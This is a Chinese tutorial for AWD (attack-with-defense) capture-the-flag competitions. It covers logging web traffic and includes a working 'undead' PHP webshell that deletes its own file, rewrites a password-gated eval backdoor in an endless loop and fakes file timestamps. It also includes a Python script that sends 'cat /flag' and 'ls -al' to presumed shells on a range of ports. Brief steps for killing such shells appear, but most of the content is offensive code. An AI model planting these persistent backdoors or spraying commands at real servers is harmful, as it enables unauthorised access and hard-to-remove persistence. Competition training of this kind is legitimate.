红蓝对抗-AWD监控&不死马&垃圾包&资源库

QQ截图20220614091118.jpg

防守-流量监控-实时获取访问数据包流量

利用 WEB 访问监控配合文件监控能实现 WEB 攻击分析及后门清除操作,确保写入后门操作失效,也能确保分析到无后门攻击漏洞的数据包便于后期利用。

  • 上传文件监控脚本log-record.php,该脚本需要在网站配置文件footer.php中包含一下,否则无法正常调用运行。

QQ截图20220614091316.jpg

  • 之后一旦有人访问了系统,它就会在/tmp/目录下生成一个log日志

QQ截图20220614091337.jpg

攻击-权限维持-不死脚本后门生成及查杀

在攻击利用后门获取 Flag 时,不死后门的权限维持尤为重要,同样防守方也要掌握对其不死后门的查杀和利用,这样才能获取更高的分数,对比文件监控前后问题。

<?php
ignore_user_abort(true);//进程运行
set_time_limit(0);
unlink(__FILE__);
$file = '2.php';
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';
while (1){
    file_put_contents($file,$code);
    system('touch -m -d "2018-12-01 09:10:12" .2.php');
    usleep(5000);
}
?>

如何清除不死马

  1. 找到对应的进程,然后杀掉
  2. 重启系统或重启服务
  3. 以更低的延迟脚本去竞争写入

其他-恶意操作-搅屎棍发包回首掏共权限

作为各种技术大家都要用的情况下,一个好的攻击漏洞和思路不被捕获和发现,一个好的套路浪费对手的时间,搅屎棍发包回首掏共权限利用思路可以尝试使用。

  • 配合抓到的真实攻击数据包,利用数据包占用其他人的攻击行为。利用后门去连接其他团队尝试
import requests
import time

def scan_attack():
    file={'shell.php','x.php','index.php'}
    payload={'cat /flag','ls -al'}
    while(1):
        for i in range(8802,8804):
            for ii in file:
                url='http://192.168.76.156:'+str(i)+'/'+ii
                for iii in payload:
                    data={
                        'payload':iii
                    }
                    try:
                        requests.post(url,data=data)
                        print("run:"+str(i)+'|'+ii+'|'+iii)
                        time.sleep(0.5)
                    except Exception as e:
                        time.sleep(0.5)
                        pass
if __name__ == '__main__':
    scan_attack()

准备-漏洞资源-漏洞资料库及脚本工具库